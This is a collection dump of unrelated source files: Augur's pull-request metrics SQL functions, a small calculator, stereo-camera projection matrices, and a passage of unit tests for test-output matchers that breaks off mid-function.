fbb2723691843d145d449be24d7b3fbe9b6f086d | 22,805 | py | Python | augur/metrics/pull_request/pull_request.py | ritikavar/augur | eeb6013a4aa95641d4b47691e39a366e621b73cc | [
"MIT"
] | null | null | null | augur/metrics/pull_request/pull_request.py | ritikavar/augur | eeb6013a4aa95641d4b47691e39a366e621b73cc | [
"MIT"
] | null | null | null | augur/metrics/pull_request/pull_request.py | ritikavar/augur | eeb6013a4aa95641d4b47691e39a366e621b73cc | [
"MIT"
] | null | null | null | """
Metrics that provide data about pull requests & their associated activity
"""
import datetime
import sqlalchemy as s
import pandas as pd
from augur.util import annotate, add_metrics
@annotate(tag='pull-requests-merge-contributor-new')
def pull_requests_merge_contributor_new(self, repo_group_id, repo_id=None, period='day', begin_date=None, end_date=None):
"""
Returns a timeseries of the count of persons contributing with an accepted commit for the first time.
:param repo_id: The repository's id
:param repo_group_id: The repository's group id
:param period: To set the periodicity to 'day', 'week', 'month' or 'year', defaults to 'day'
:param begin_date: Specifies the begin date, defaults to '1970-1-1 00:00:00'
:param end_date: Specifies the end date, defaults to datetime.now()
:return: DataFrame of persons/period
"""
if not begin_date:
begin_date = '1970-1-1 00:00:01'
if not end_date:
end_date = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
if repo_id:
commitNewContributor = s.sql.text("""
SELECT date_trunc(:period, new_date::DATE) as commit_date,
COUNT(cmt_author_email), repo_name
FROM ( SELECT repo_name, cmt_author_email, MIN(TO_TIMESTAMP(cmt_author_date,'YYYY-MM-DD')) AS new_date
FROM commits JOIN repo ON commits.repo_id = repo.repo_id
WHERE commits.repo_id = :repo_id
AND TO_TIMESTAMP(cmt_author_date,'YYYY-MM-DD') BETWEEN :begin_date AND :end_date AND cmt_author_email IS NOT NULL
GROUP BY cmt_author_email, repo_name
) as abc GROUP BY commit_date, repo_name
""")
results = pd.read_sql(commitNewContributor, self.database, params={'repo_id': repo_id, 'period': period,
'begin_date': begin_date,
'end_date': end_date})
else:
commitNewContributor = s.sql.text("""
SELECT abc.repo_id, repo_name ,date_trunc(:period, new_date::DATE) as commit_date,
COUNT(cmt_author_email)
FROM (SELECT cmt_author_email, MIN(TO_TIMESTAMP(cmt_author_date, 'YYYY-MM-DD')) AS new_date, repo_id
FROM commits
WHERE repo_id in (SELECT repo_id FROM repo WHERE repo_group_id = :repo_group_id)
AND TO_TIMESTAMP(cmt_author_date, 'YYYY-MM-DD') BETWEEN :begin_date AND :end_date
AND cmt_author_email IS NOT NULL
GROUP BY cmt_author_email, repo_id
) as abc, repo
WHERE abc.repo_id = repo.repo_id
GROUP BY abc.repo_id, repo_name, commit_date
""")
results = pd.read_sql(commitNewContributor, self.database,
params={'repo_group_id': repo_group_id, 'period': period,
'begin_date': begin_date,
'end_date': end_date})
return results
@annotate(tag='pull-requests-closed-no-merge')
def pull_requests_closed_no_merge(self, repo_group_id, repo_id=None, period='day', begin_date=None, end_date=None):
"""
Returns a timeseries of the which were closed but not merged
:param repo_id: The repository's id
:param repo_group_id: The repository's group id
:param period: To set the periodicity to 'day', 'week', 'month' or 'year', defaults to 'day'
:param begin_date: Specifies the begin date, defaults to '1970-1-1 00:00:00'
:param end_date: Specifies the end date, defaults to datetime.now()
:return: DataFrame of persons/period
"""
if not begin_date:
begin_date = '1970-1-1 00:00:01'
if not end_date:
end_date = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
if repo_id:
closedNoMerge = s.sql.text("""
SELECT DATE_TRUNC(:period, pull_requests.pr_closed_at) AS closed_date,
COUNT(pull_request_id) as pr_count
FROM pull_requests JOIN repo ON pull_requests.repo_id = repo.repo_id
WHERE pull_requests.repo_id = :repo_id
AND pull_requests.pr_closed_at is NOT NULL AND
pull_requests.pr_merged_at is NULL
GROUP BY closed_date, pull_request_id
ORDER BY closed_date
""")
results = pd.read_sql(closedNoMerge, self.database, params={'repo_id': repo_id, 'period': period,
'begin_date': begin_date,
'end_date': end_date})
else:
closedNoMerge = s.sql.text("""
SELECT DATE_TRUNC(:period, pull_requests.pr_closed_at) AS closed_date,
COUNT(pull_request_id) as pr_count
FROM pull_requests JOIN repo ON pull_requests.repo_id = repo.repo_id WHERE pull_requests.repo_id in (SELECT repo_id FROM repo WHERE repo_group_id = :repo_group_id)
and pull_requests.pr_closed_at is NOT NULL and pull_requests.pr_merged_at is NULL
GROUP BY closed_date, pull_request_id
ORDER BY closed_date
""")
results = pd.read_sql(closedNoMerge, self.database,
params={'repo_group_id': repo_group_id, 'period': period,
'begin_date': begin_date,
'end_date': end_date})
return results
@annotate(tag='reviews')
def reviews(self, repo_group_id, repo_id=None, period='day', begin_date=None, end_date=None):
""" Returns a timeseris of new reviews or pull requests opened
:param repo_group_id: The repository's repo_group_id
:param repo_id: The repository's repo_id, defaults to None
:param period: To set the periodicity to 'day', 'week', 'month' or 'year', defaults to 'day'
:param begin_date: Specifies the begin date, defaults to '1970-1-1 00:00:00'
:param end_date: Specifies the end date, defaults to datetime.now()
:return: DataFrame of new reviews/period
"""
if not begin_date:
begin_date = '1970-1-1'
if not end_date:
end_date = datetime.datetime.now().strftime('%Y-%m-%d')
if not repo_id:
reviews_SQL = s.sql.text("""
SELECT
pull_requests.repo_id,
repo_name,
DATE_TRUNC(:period, pull_requests.pr_created_at) AS date,
COUNT(pr_src_id) AS pull_requests
FROM pull_requests JOIN repo ON pull_requests.repo_id = repo.repo_id
WHERE pull_requests.repo_id IN
(SELECT repo_id FROM repo WHERE repo_group_id = :repo_group_id)
AND pull_requests.pr_created_at
BETWEEN to_timestamp(:begin_date, 'YYYY-MM-DD')
AND to_timestamp(:end_date, 'YYYY-MM-DD')
GROUP BY pull_requests.repo_id, repo_name, date
ORDER BY pull_requests.repo_id, date
""")
results = pd.read_sql(reviews_SQL, self.database,
params={'period': period, 'repo_group_id': repo_group_id,
'begin_date': begin_date, 'end_date': end_date })
return results
else:
reviews_SQL = s.sql.text("""
SELECT
repo_name,
DATE_TRUNC(:period, pull_requests.pr_created_at) AS date,
COUNT(pr_src_id) AS pull_requests
FROM pull_requests JOIN repo ON pull_requests.repo_id = repo.repo_id
WHERE pull_requests.repo_id = :repo_id
AND pull_requests.pr_created_at
BETWEEN to_timestamp(:begin_date, 'YYYY-MM-DD HH24:MI:SS')
AND to_timestamp(:end_date, 'YYYY-MM-DD HH24:MI:SS')
GROUP BY date, repo_name
ORDER BY date
""")
results = pd.read_sql(reviews_SQL, self.database,
params={'period': period, 'repo_id': repo_id,
'begin_date': begin_date, 'end_date': end_date})
return results
@annotate(tag='reviews-accepted')
def reviews_accepted(self, repo_group_id, repo_id=None, period='day', begin_date=None, end_date=None):
"""Returns a timeseries of number of reviews or pull requests accepted.
:param repo_group_id: The repository's repo_group_id
:param repo_id: The repository's repo_id, defaults to None
:param period: To set the periodicity to 'day', 'week', 'month' or 'year', defaults to 'day'
:param begin_date: Specifies the begin date, defaults to '1970-1-1 00:00:00'
:param end_date: Specifies the end date, defaults to datetime.now()
:return: DataFrame of accepted reviews/period
"""
if not begin_date:
begin_date = '1970-1-1'
if not end_date:
end_date = datetime.datetime.now().strftime('%Y-%m-%d')
if not repo_id:
reviews_accepted_SQL = s.sql.text("""
SELECT
pull_requests.repo_id,
repo.repo_name,
DATE_TRUNC(:period, pull_requests.pr_merged_at) AS date,
COUNT(pr_src_id) AS pull_requests
FROM pull_requests JOIN repo ON pull_requests.repo_id = repo.repo_id
WHERE pull_requests.repo_id IN
(SELECT repo_id FROM repo WHERE repo_group_id = :repo_group_id)
AND pr_merged_at IS NOT NULL
AND pr_merged_at
BETWEEN to_timestamp(:begin_date, 'YYYY-MM-DD')
AND to_timestamp(:end_date, 'YYYY-MM-DD')
GROUP BY pull_requests.repo_id, repo_name, date
ORDER BY pull_requests.repo_id, date
""")
results = pd.read_sql(reviews_accepted_SQL, self.database,
params={'period': period, 'repo_group_id': repo_group_id,
'begin_date': begin_date, 'end_date': end_date})
return results
else:
reviews_accepted_SQL = s.sql.text("""
SELECT
repo.repo_name,
DATE_TRUNC(:period, pull_requests.pr_merged_at) AS date,
COUNT(pr_src_id) AS pull_requests
FROM pull_requests JOIN repo ON pull_requests.repo_id = repo.repo_id
WHERE pull_requests.repo_id = :repo_id
AND pr_merged_at IS NOT NULL
AND pr_merged_at
BETWEEN to_timestamp(:begin_date, 'YYYY-MM-DD')
AND to_timestamp(:end_date, 'YYYY-MM-DD')
GROUP BY date, repo.repo_name
ORDER BY date
""")
results = pd.read_sql(reviews_accepted_SQL, self.database,
params={'period': period, 'repo_id': repo_id,
'begin_date': begin_date, 'end_date': end_date})
return results
@annotate(tag='reviews-declined')
def reviews_declined(self, repo_group_id, repo_id=None, period='day', begin_date=None, end_date=None):
""" Returns a time series of reivews declined
:param repo_group_id: The repository's repo_group_id
:param repo_id: The repository's repo_id, defaults to None
:param period: To set the periodicity to 'day', 'week', 'month' or 'year', defaults to 'day'
:param begin_date: Specifies the begin date, defaults to '1970-1-1 00:00:00'
:param end_date: Specifies the end date, defaults to datetime.now()
:return: DataFrame of declined reviews/period
"""
if not begin_date:
begin_date = '1970-1-1'
if not end_date:
end_date = datetime.datetime.now().strftime('%Y-%m-%d')
if not repo_id:
reviews_declined_SQL = s.sql.text("""
SELECT
pull_requests.repo_id,
repo.repo_name,
DATE_TRUNC(:period, pull_requests.pr_closed_at) AS date,
COUNT(pr_src_id) AS pull_requests
FROM pull_requests JOIN repo ON pull_requests.repo_id = repo.repo_id
WHERE pull_requests.repo_id IN
(SELECT repo_id FROM repo WHERE repo_group_id = :repo_group_id)
AND pr_src_state = 'closed' AND pr_merged_at IS NULL
AND pr_closed_at
BETWEEN to_timestamp(:begin_date, 'YYYY-MM-DD')
AND to_timestamp(:end_date, 'YYYY-MM-DD')
GROUP BY pull_requests.repo_id, repo_name, date
ORDER BY pull_requests.repo_id, date
""")
results = pd.read_sql(reviews_declined_SQL, self.database,
params={'period': period, 'repo_group_id': repo_group_id,
'begin_date': begin_date, 'end_date': end_date })
return results
else:
reviews_declined_SQL = s.sql.text("""
SELECT
repo.repo_name,
DATE_TRUNC(:period, pull_requests.pr_closed_at) AS date,
COUNT(pr_src_id) AS pull_requests
FROM pull_requests JOIN repo ON pull_requests.repo_id = repo.repo_id
WHERE pull_requests.repo_id = :repo_id
AND pr_src_state = 'closed' AND pr_merged_at IS NULL
AND pr_closed_at
BETWEEN to_timestamp(:begin_date, 'YYYY-MM-DD')
AND to_timestamp(:end_date, 'YYYY-MM-DD')
GROUP BY date, repo.repo_name
ORDER BY date
""")
results = pd.read_sql(reviews_declined_SQL, self.database,
params={'period': period, 'repo_id': repo_id,
'begin_date': begin_date, 'end_date': end_date})
return results
@annotate(tag='review-duration')
def review_duration(self, repo_group_id, repo_id=None, begin_date=None, end_date=None):
""" Returns the duration of each accepted review.
:param repo_group_id: The repository's repo_group_id
:param repo_id: The repository's repo_id, defaults to None
:param begin_date: Specifies the begin date, defaults to '1970-1-1 00:00:00'
:param end_date: Specifies the end date, defaults to datetime.now()
:return: DataFrame of pull request id with the corresponding duration
"""
if not begin_date:
begin_date = '1970-1-1'
if not end_date:
end_date = datetime.datetime.now().strftime('%Y-%m-%d')
if not repo_id:
review_duration_SQL = s.sql.text("""
SELECT
pull_requests.repo_id,
repo.repo_name,
pull_requests.pull_request_id,
pull_requests.pr_created_at AS created_at,
pull_requests.pr_merged_at AS merged_at,
(pr_merged_at - pr_created_at) AS duration
FROM pull_requests JOIN repo ON pull_requests.repo_id = repo.repo_id
WHERE pull_requests.repo_id IN
(SELECT repo_id FROM repo WHERE repo_group_id = :repo_group_id)
AND pr_merged_at IS NOT NULL
AND pr_created_at
BETWEEN to_timestamp(:begin_date, 'YYYY-MM-DD')
AND to_timestamp(:end_date, 'YYYY-MM-DD')
ORDER BY pull_requests.repo_id, pull_requests.pull_request_id
""")
results = pd.read_sql(review_duration_SQL, self.database,
params={'repo_group_id': repo_group_id,
'begin_date': begin_date,
'end_date': end_date})
results['duration'] = results['duration'].astype(str)
return results
else:
review_duration_SQL = s.sql.text("""
SELECT
repo_name,
pull_request_id,
pr_created_at AS created_at,
pr_merged_at AS merged_at,
(pr_merged_at - pr_created_at) AS duration
FROM pull_requests JOIN repo ON pull_requests.repo_id = repo.repo_id
WHERE pull_requests.repo_id = :repo_id
AND pr_merged_at IS NOT NULL
AND pr_created_at
BETWEEN to_timestamp(:begin_date, 'YYYY-MM-DD')
AND to_timestamp(:end_date, 'YYYY-MM-DD')
ORDER BY pull_requests.repo_id, pull_request_id
""")
results = pd.read_sql(review_duration_SQL, self.database,
params={'repo_id': repo_id,
'begin_date': begin_date,
'end_date': end_date})
results['duration'] = results['duration'].astype(str)
return results
@annotate(tag='pull-request-acceptance-rate')
def pull_request_acceptance_rate(self, repo_group_id, repo_id=None, begin_date=None, end_date=None, group_by='week'):
"""
Timeseries of pull request acceptance rate (expressed as the ratio of pull requests merged on a date to the count of pull requests opened on a date)
:param repo_group_id: The repository's repo_group_id
:param repo_id: The repository's repo_id, defaults to None
:return: DataFrame with ratio/day
"""
if not begin_date:
begin_date = '1970-1-1 00:00:01'
if not end_date:
end_date = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
if not repo_id:
prAccRateSQL = s.sql.text("""
SELECT DATE(date_created) AS "date", CAST(num_approved AS DECIMAL)/CAST(num_open AS DECIMAL) AS "rate"
FROM
(
SELECT count(issue_events.issue_id) AS num_approved,
date_trunc(:group_by,issue_events.created_at) AS accepted_on
FROM issue_events JOIN issues ON issues.issue_id = issue_events.issue_id
JOIN repo ON issues.repo_id = repo.repo_id
WHERE action = 'merged'
AND issues.pull_request IS NOT NULL
AND repo_group_id = :repo_group_id
AND issue_events.created_at BETWEEN :begin_date AND :end_date
GROUP BY accepted_on
ORDER BY accepted_on
) accepted
JOIN
(
SELECT count(issue_events.issue_id) AS num_open,
date_trunc(:group_by,issue_events.created_at) AS date_created
FROM issue_events JOIN issues ON issues.issue_id = issue_events.issue_id
JOIN repo ON issues.repo_id = repo.repo_id
WHERE action = 'ready_for_review'
AND issues.pull_request IS NOT NULL
AND repo_group_id = :repo_group_id
AND issue_events.created_at BETWEEN :begin_date AND :end_date
GROUP BY date_created
ORDER BY date_created
) opened
ON opened.date_created = accepted.accepted_on
""")
results = pd.read_sql(prAccRateSQL, self.database, params={'repo_group_id': repo_group_id, 'group_by': group_by,
'begin_date': begin_date, 'end_date': end_date})
return results
else:
prAccRateSQL = s.sql.text("""
SELECT DATE(date_created) AS "date", CAST(num_approved AS DECIMAL)/CAST(num_open AS DECIMAL) AS "rate"
FROM
(
SELECT count(issue_events.issue_id) AS num_approved,
date_trunc(:group_by,issue_events.created_at) AS accepted_on
FROM issue_events JOIN issues ON issues.issue_id = issue_events.issue_id
WHERE action = 'merged'
AND issues.pull_request IS NOT NULL
AND repo_id = :repo_id
AND issue_events.created_at BETWEEN :begin_date AND :end_date
GROUP BY accepted_on
ORDER BY accepted_on
) accepted
JOIN
(
SELECT count(issue_events.issue_id) AS num_open,
date_trunc(:group_by,issue_events.created_at) AS date_created
FROM issue_events JOIN issues ON issues.issue_id = issue_events.issue_id
WHERE action = 'ready_for_review'
AND issues.pull_request IS NOT NULL
AND repo_id = :repo_id
AND issue_events.created_at BETWEEN :begin_date AND :end_date
GROUP BY date_created
ORDER BY date_created
) opened
ON opened.date_created = accepted.accepted_on
""")
results = pd.read_sql(prAccRateSQL, self.database, params={'repo_id': repo_id, 'group_by': group_by,
'begin_date': begin_date, 'end_date': end_date})
return results
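    # The rate above is, per time bucket (a hedged restatement of the SQL, not
    # additional behavior):
    #
    #   rate = count(issue_events with action = 'merged')
    #        / count(issue_events with action = 'ready_for_review')
    #
    # with both counts truncated to the same `group_by` unit, so a call such as
    # metrics.pull_request_acceptance_rate(repo_group_id, group_by='week')
    # yields one row per week with columns ['date', 'rate'].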
@annotate(tag='pull-request-merged-status-counts')
def pull_request_merged_status_counts(self, repo_group_id, repo_id=None, begin_date='1970-1-1 00:00:01', end_date=None, group_by='week'):
"""
        Timeseries of the counts of closed pull requests, grouped by merged status ('Merged' vs. 'Rejected')
        :param repo_group_id: The repository's repo_group_id
        :param repo_id: The repository's repo_id, defaults to None
        :param begin_date: pull requests opened after this date
        :param end_date: pull requests closed before this date, defaults to the current time
        :param group_by: time unit for the closed_* grouping columns ('year', 'month', 'week', or 'day'), defaults to 'week'
        :return: DataFrame of merged and rejected pull request counts per time period
"""
if not end_date:
end_date = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
        # Build the date_part columns to group by: every unit at least as
        # coarse as `group_by`, e.g. group_by='week' yields
        # ['closed_year', 'closed_month', 'closed_week'].
        unit_options = ['year', 'month', 'week', 'day']
        time_group_bys = []
        for time_unit in unit_options.copy():
            if group_by not in unit_options:
                continue
            time_group_bys.append('closed_{}'.format(time_unit))
            del unit_options[0]
if not repo_id:
            pr_all_sql = s.sql.text("""
                -- Group-level variant of the single-repo query in the else
                -- branch below; the original source left this query body
                -- blank, so this reconstruction mirrors that query with a
                -- repo-group filter.
                SELECT
                    pull_request_id as pull_request_count,
                    CASE WHEN pr_merged_at IS NULL THEN 'Rejected' ELSE 'Merged' end as merged_status,
                    date_part( 'year', pr_closed_at :: DATE ) AS closed_year,
                    date_part( 'month', pr_closed_at :: DATE ) AS closed_month,
                    date_part( 'week', pr_closed_at :: DATE ) AS closed_week,
                    date_part( 'day', pr_closed_at :: DATE ) AS closed_day
                from pull_requests
                where repo_id IN (SELECT repo_id FROM repo WHERE repo_group_id = :repo_group_id)
                AND pr_created_at::date >= :begin_date ::date
                AND pr_closed_at::date <= :end_date ::date
            """)
else:
pr_all_sql = s.sql.text("""
SELECT
pull_request_id as pull_request_count,
CASE WHEN pr_merged_at IS NULL THEN 'Rejected' ELSE 'Merged' end as merged_status,
date_part( 'year', pr_closed_at :: DATE ) AS closed_year,
date_part( 'month', pr_closed_at :: DATE ) AS closed_month,
date_part( 'week', pr_closed_at :: DATE ) AS closed_week,
date_part( 'day', pr_closed_at :: DATE ) AS closed_day
from pull_requests
where repo_id = :repo_id
AND pr_created_at::date >= :begin_date ::date
AND pr_closed_at::date <= :end_date ::date
""")
pr_all = pd.read_sql(pr_all_sql, self.database, params={'repo_group_id': repo_group_id,
'repo_id': repo_id, 'begin_date': begin_date, 'end_date': end_date})
pr_counts = pr_all.groupby(['merged_status'] + time_group_bys).count().reset_index()[time_group_bys + ['merged_status', 'pull_request_count']]
return pr_counts
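    # Shape of the result above (a hedged illustration, not additional
    # behavior): one row per (time bucket, merged_status) combination, e.g.
    # with group_by='week' the columns are
    #   closed_year | closed_month | closed_week | merged_status | pull_request_count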
def create_pull_request_metrics(metrics):
add_metrics(metrics, __name__)
| 47.313278 | 175 | 0.599474 | 3,033 | 22,805 | 4.221563 | 0.057699 | 0.056232 | 0.046392 | 0.044986 | 0.881053 | 0.856061 | 0.832787 | 0.820369 | 0.817167 | 0.807638 | 0 | 0.009545 | 0.315501 | 22,805 | 481 | 176 | 47.411642 | 0.810698 | 0.139399 | 0 | 0.760108 | 0 | 0.016173 | 0.635917 | 0.125911 | 0 | 0 | 0 | 0 | 0 | 1 | 0.024259 | false | 0 | 0.010782 | 0 | 0.070081 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
fbbf414cb06739ab19e98cccca9bee549db8101f | 280 | py | Python | cal.py | mauryaSFD/TESTPY | 38e81e3140ea2707d0941653f1d13919f0b59e1e | [
"MIT"
] | null | null | null | cal.py | mauryaSFD/TESTPY | 38e81e3140ea2707d0941653f1d13919f0b59e1e | [
"MIT"
] | null | null | null | cal.py | mauryaSFD/TESTPY | 38e81e3140ea2707d0941653f1d13919f0b59e1e | [
"MIT"
] | null | null | null | def add(x, y):
    return x + y

def subtract(x, y):
    return x - y

def multiply(x, y):
    return x * y

def divide(x, y):
    return x / y
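
if __name__ == "__main__":
    # Minimal smoke test (an illustrative addition, not in the original file).
    assert add(2, 3) == 5
    assert subtract(5, 2) == 3
    assert multiply(3, 4) == 12
    assert divide(8, 2) == 4.0
    print("all calculator checks passed")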
| 11.666667 | 18 | 0.507143 | 56 | 280 | 2.535714 | 0.160714 | 0.225352 | 0.246479 | 0.295775 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0.317857 | 280 | 23 | 19 | 12.173913 | 0.743456 | 0 | 0 | 0.875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.375 | 0 | null | null | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 12 |
fbd699dd02c28efda597a36090e23001ba51de76 | 614 | py | Python | src/stereo_cal.py | jwalthour/calibrationfinder | bc7853ea5553a73442f486c08a62bbb3aa1a1d86 | [
"Apache-2.0"
] | null | null | null | src/stereo_cal.py | jwalthour/calibrationfinder | bc7853ea5553a73442f486c08a62bbb3aa1a1d86 | [
"Apache-2.0"
] | null | null | null | src/stereo_cal.py | jwalthour/calibrationfinder | bc7853ea5553a73442f486c08a62bbb3aa1a1d86 | [
"Apache-2.0"
] | null | null | null | from numpy import array
# Stereo calibration result: minimum reprojection error and the 3x4 projection
# matrices for the left and right cameras.
stereo_cal = {
    'minError': 7.020103378301475,
    'leftProjMat': array([
        [1.07157998e+03, 0.00000000e+00, -2.38154042e+02, 0.00000000e+00],
        [0.00000000e+00, 1.07157998e+03, 2.75471520e+02, 0.00000000e+00],
        [0.00000000e+00, 0.00000000e+00, 1.00000000e+00, 0.00000000e+00],
    ]),
    'rightProjMat': array([
        [1.07157998e+03, 0.00000000e+00, -2.38154042e+02, -1.03190287e+06],
        [0.00000000e+00, 1.07157998e+03, 2.75471520e+02, 0.00000000e+00],
        [0.00000000e+00, 0.00000000e+00, 1.00000000e+00, 0.00000000e+00],
    ]),
}
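
# Illustrative downstream use (a hedged sketch, not in the original file): the
# two 3x4 projection matrices are in the form OpenCV's triangulation expects,
# e.g. given 2xN pixel arrays `left_pts` and `right_pts`:
#
#   import cv2
#   pts4d = cv2.triangulatePoints(stereo_cal['leftProjMat'],
#                                 stereo_cal['rightProjMat'],
#                                 left_pts, right_pts)
#   pts3d = pts4d[:3] / pts4d[3]  # dehomogenize to 3xN world coordinates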
| 47.230769 | 118 | 0.610749 | 85 | 614 | 4.4 | 0.270588 | 0.441176 | 0.417112 | 0.393048 | 0.764706 | 0.764706 | 0.764706 | 0.73262 | 0.73262 | 0.73262 | 0 | 0.57971 | 0.213355 | 614 | 12 | 119 | 51.166667 | 0.194617 | 0 | 0 | 0.583333 | 0 | 0 | 0.050489 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.083333 | 0 | 0.083333 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
fbdb6314364f951c7e1a0fe984fee9861beda575 | 8,862 | py | Python | systemtests/common/test_TestExecutionMatchers.py | chyla/OutputMatchTestingTool | 186e7a86d6eecb83e13fb021626e1944a26abbd3 | [
"BSD-3-Clause"
] | 5 | 2020-01-26T22:56:16.000Z | 2022-01-23T22:32:18.000Z | systemtests/common/test_TestExecutionMatchers.py | chyla/OutputMatchTestingTool | 186e7a86d6eecb83e13fb021626e1944a26abbd3 | [
"BSD-3-Clause"
] | null | null | null | systemtests/common/test_TestExecutionMatchers.py | chyla/OutputMatchTestingTool | 186e7a86d6eecb83e13fb021626e1944a26abbd3 | [
"BSD-3-Clause"
] | null | null | null | # Copyright (c) 2019-2022, Adam Chyła <adam@chyla.org>.
# All rights reserved.
#
# Distributed under the terms of the BSD 3-Clause License.
from . import TestExecutionMatchers
import unittest
import unittest.mock
first_test_name = "cat-will-exit-with-zero.omtt"
second_test_name = "cat-will_match_part_of_output.omtt"
PASS = "PASS"
FAIL = "FAIL"
def create_omtt_result(first_test_result, second_test_result):
result = unittest.mock.Mock()
result.stdout = f"""
Testing: /bin/cat
====================
Running test (1/2): examples/{first_test_name}
Verdict: {first_test_result}
====================
Running test (2/2): examples/{second_test_name}
Verdict: {second_test_result}
"""
return result
class TestsWereExecutedInOrderTestSuite(unittest.TestCase):
def test_does_nothing_when_order_match(self):
result = create_omtt_result(PASS, PASS)
TestExecutionMatchers.tests_were_executed_in_order(
result, [first_test_name, second_test_name]
)
def test_raises_exception_when_order_is_wrong_on_first_position(self):
result = create_omtt_result(PASS, PASS)
with self.assertRaises(Exception) as cm:
TestExecutionMatchers.tests_were_executed_in_order(
result, [first_test_name, first_test_name]
)
self.assertEqual(
f"Wrong order, expected: '{first_test_name}'; got line with: 'Running test (2/2): examples/{second_test_name}'",
str(cm.exception),
)
def test_raises_exception_when_order_is_wrong_on_later_position(self):
result = create_omtt_result(PASS, PASS)
with self.assertRaises(Exception) as cm:
TestExecutionMatchers.tests_were_executed_in_order(
result, [second_test_name, first_test_name]
)
self.assertEqual(
f"Wrong order, expected: '{second_test_name}'; got line with: 'Running test (1/2): examples/{first_test_name}'",
str(cm.exception),
)
def test_raises_exception_when_expected_order_list_is_longer_than_output(self):
result = create_omtt_result(PASS, PASS)
with self.assertRaises(Exception) as cm:
TestExecutionMatchers.tests_were_executed_in_order(
result, [first_test_name, second_test_name, second_test_name]
)
self.assertIn("Can't check order, unequal lengths.", str(cm.exception))
def test_raises_exception_when_expected_order_list_is_shorter_than_output(self):
result = create_omtt_result(PASS, PASS)
with self.assertRaises(Exception) as cm:
TestExecutionMatchers.tests_were_executed_in_order(
result, [first_test_name]
)
self.assertIn("Can't check order, unequal lengths.", str(cm.exception))
class TestsWasExecutedWithSpecifiedOrder(unittest.TestCase):
def test_does_nothing_when_number_match(self):
result = create_omtt_result(PASS, PASS)
TestExecutionMatchers.test_was_executed_with_specified_order(
result, number=2, of=2, test_file_name=second_test_name
)
def test_raises_exception_when_order_is_wrong(self):
result = create_omtt_result(PASS, PASS)
with self.assertRaises(Exception) as cm:
TestExecutionMatchers.test_was_executed_with_specified_order(
result, number=1, of=2, test_file_name=second_test_name
)
self.assertIn(
f"Wrong (or missing) order (1/2) in line: 'Running test (2/2): examples/{second_test_name}'",
str(cm.exception),
)
def test_raises_exception_when_line_with_test_not_found(self):
result = create_omtt_result(PASS, PASS)
not_existing_test = "not_existing_test.omtt"
with self.assertRaises(Exception) as cm:
TestExecutionMatchers.test_was_executed_with_specified_order(
result, number=1, of=2, test_file_name=not_existing_test
)
self.assertEqual(
f"Line with test not found: {not_existing_test}", str(cm.exception)
)
class TestWasExecutedWithPassTestSuite(unittest.TestCase):
def test_assert_exception_is_not_thrown_when_test_pass(self):
result = create_omtt_result(PASS, PASS)
TestExecutionMatchers.test_was_executed_with_pass(result, first_test_name)
def test_assert_exception_is_thrown_when_first_test_fail(self):
result = create_omtt_result(FAIL, PASS)
with self.assertRaises(AssertionError):
TestExecutionMatchers.test_was_executed_with_pass(result, first_test_name)
def test_assert_exception_is_thrown_when_second_test_fail(self):
result = create_omtt_result(PASS, FAIL)
with self.assertRaises(AssertionError):
TestExecutionMatchers.test_was_executed_with_pass(result, second_test_name)
def test_exception_is_thrown_when_test_name_is_not_found_in_output(self):
result = create_omtt_result(PASS, PASS)
non_existing_test_name = "some_test.omtt"
with self.assertRaises(Exception) as cm:
TestExecutionMatchers.test_was_executed_with_pass(
result, non_existing_test_name
)
self.assertEqual(f"Test {non_existing_test_name} not found.", str(cm.exception))
def test_exception_is_thrown_when_test_verdict_is_missing(self):
result = unittest.mock.Mock()
result.stdout = f"""
Testing: /bin/cat
====================
Running test (1/2): examples/{first_test_name}
====================
Running test (2/2): examples/{second_test_name}
Verdict: PASS
"""
with self.assertRaises(Exception) as cm:
TestExecutionMatchers.test_was_executed_with_pass(result, first_test_name)
self.assertEqual(
f"Test verdict (for {first_test_name}) not found.", str(cm.exception)
)
def test_exception_is_thrown_when_test_verdict_is_missing_due_to_cutted_output(
self,
):
result = unittest.mock.Mock()
result.stdout = f"""
Testing: /bin/cat
====================
Running test (1/2): examples/{first_test_name}
Verdict: PASS
====================
Running test (2/2): examples/{second_test_name}
"""
with self.assertRaises(Exception) as cm:
TestExecutionMatchers.test_was_executed_with_pass(result, second_test_name)
self.assertEqual(
f"Test verdict (for {second_test_name}) not found.", str(cm.exception)
)
class TestWasExecutedWithFailTestSuite(unittest.TestCase):
def test_assert_exception_is_not_thrown_when_test_fail(self):
result = create_omtt_result(FAIL, FAIL)
TestExecutionMatchers.test_was_executed_with_fail(result, first_test_name)
def test_assert_exception_is_thrown_when_first_test_pass(self):
result = create_omtt_result(PASS, FAIL)
with self.assertRaises(AssertionError):
TestExecutionMatchers.test_was_executed_with_fail(result, first_test_name)
def test_assert_exception_is_thrown_when_second_test_pass(self):
result = create_omtt_result(FAIL, PASS)
with self.assertRaises(AssertionError):
TestExecutionMatchers.test_was_executed_with_fail(result, second_test_name)
def test_exception_is_thrown_when_test_name_is_not_found_in_output(self):
result = create_omtt_result(FAIL, FAIL)
non_existing_test_name = "some_test.omtt"
with self.assertRaises(Exception) as cm:
TestExecutionMatchers.test_was_executed_with_fail(
